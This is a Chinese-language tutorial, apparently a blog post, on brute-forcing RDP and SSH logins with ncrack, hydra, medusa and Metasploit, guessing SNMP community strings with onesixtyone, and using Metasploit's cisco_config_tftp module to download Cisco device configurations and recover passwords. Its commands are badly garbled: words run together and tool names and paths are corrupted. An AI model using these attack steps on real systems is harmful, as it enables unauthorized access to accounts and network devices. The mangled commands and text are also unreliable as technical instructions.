我需要一本强大的词典。 如果太大,计算机索引就达不到,没用
破译密码取决于运气。 运气几秒钟、几分钟也有可能。 运气不好的话一天两天解不开也很正常。 请一定要试试
暴力破解可能会影响机器的CPU,导致拒绝服务.也可能拒绝密码登录.
工具: https://github.com/tear security/leviathan
Leviathan是一个大型审计工具包,具有广泛的服务发现、强大的SQ L注入检测和自定义漏洞利用功能。 它包括masscan、ncrack和dsss等开源工具,提供了将它们结合使用的灵活性。
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _。
官方给出了演示和相关文档! n crack :https://nmap.org/n crack/man.htmlncrack突破RDP帐户
n crack-u管理员- p/root/shell work/userandpassword/password.pwd-p 3389192.168.2.110离散描述性软件TCP 3360192.1668 TCP ms-wbt-server : ' administrator ' ' 00000 ' rdesktop 192.168.2.110 n crack-p22-user username - sername password.txtiphydra :https://github.com/vanha user-thc/thc-hydra-l root-p/root/shell work/userandpasswwork password.txt 192.168.2.111 ssh medusa : https ://github.com/jmk-foo fus/medusa medusa-ummus roo om password.txt-h 192.168.2.111-mssh metasploit : msfuseauxiliary/scanner/ssh/ssh _ loginmsfauxiliary (ssh ssh_login ) setuser _ file/root/shell work/userandpassword/user.usr user username.txtmsfauxiliary (scaner/ssh userandpassword/password.sword userandpassword/password.txtmsfauxiliary (scanner/ssh/ssh _ log in ) set threads4thred ssh_login ) sh reads4threads=4MSF auxiliar set rhosts 192.168.2.111 rhosts=192.168.2.111 MSF auxiliary (扫描器/)
为Cisco设备推测社区字符串: onesixtyone :https://github.com/trailofbits/onesixtyone
SNMP协议是一种无状态的、面向数据报的协议。 SNMP扫描仪是一个将SNMP请求发送到多个IP地址,然后尝试不同的团体字符串并等待回复的程序。
SNMP协议: https://blog.csdn.net/shan zhizi/article/details/11606767
onesixtyone-c/usr/share/doc/onesixtyone/dict.txtip # onesixtyone可以找到公共和私有社区字符串。 #将找到的团体字符串写入文件echo-e'publicnsecret
msfsearchsnmp _ loginmatchingmodules================namedisclosuredaterankdescription--------------。 SNMP _ loginnormalsnmpcommunityloginscannermsfuseauxiliary/scanner/SNMP/SNMP _ loginmsfauxiliary (showoptionsmsfauxililiary SNMP_login ) set pass _ filetext.txtpass _ file=text.txtmsfauxiliary ) SCC tpass.file=text.txtmsfauxiliary sethry SNMP_login ) exploitMSFauxiliary ) scanner/SNMP/SNMP_login ) cogin社区字是只读还是可读写SNMP和TFTP SNMP可以获取设备的设置信息并进行设置。 TFTP是Cisco设备将配置文件、新映像和其他信息加载到交换机或路由设备的方法之一,Cisco设备用作TFTP服务器,其他操作系统从设备加载配置信息和配置信息
可以使用SNMP获取Cisco设备的配置信息和运行配置,然后使用TFCP将新配置发送回服务器。
msfuseauxiliary/scanner/SNMP/Cisco _ config _ tftpmsfauxiliary (scanner/SNMP/Cisco _ config _ TFTP ) showoptionion 3360 namecurrentsettingrequireddescription-----------communiii dressofthesystemrunningthismoduleoutputdirngtion retries1yessnmpretriesrhostsyesthetargetaddressrangeorcidridentifierrport 161 yesthetargetport (UDP ) ) ) ) ) ) ) ) nning (4)4) configuration accepted : ) 3,4 ) threads1yesthenumberofconcurrenttthreadstimeout1yessnmptimeoutversion 1 2 cmsfauxiliary (scanner/SNMP/Cisco _ config _ TFTP )此模块可以向设备发送SNMP写入命令和下载配置式。 如果成功,msf将启动TFTP服务,并将设备连接到msf启动的服务。
msf解析文件,得到密码。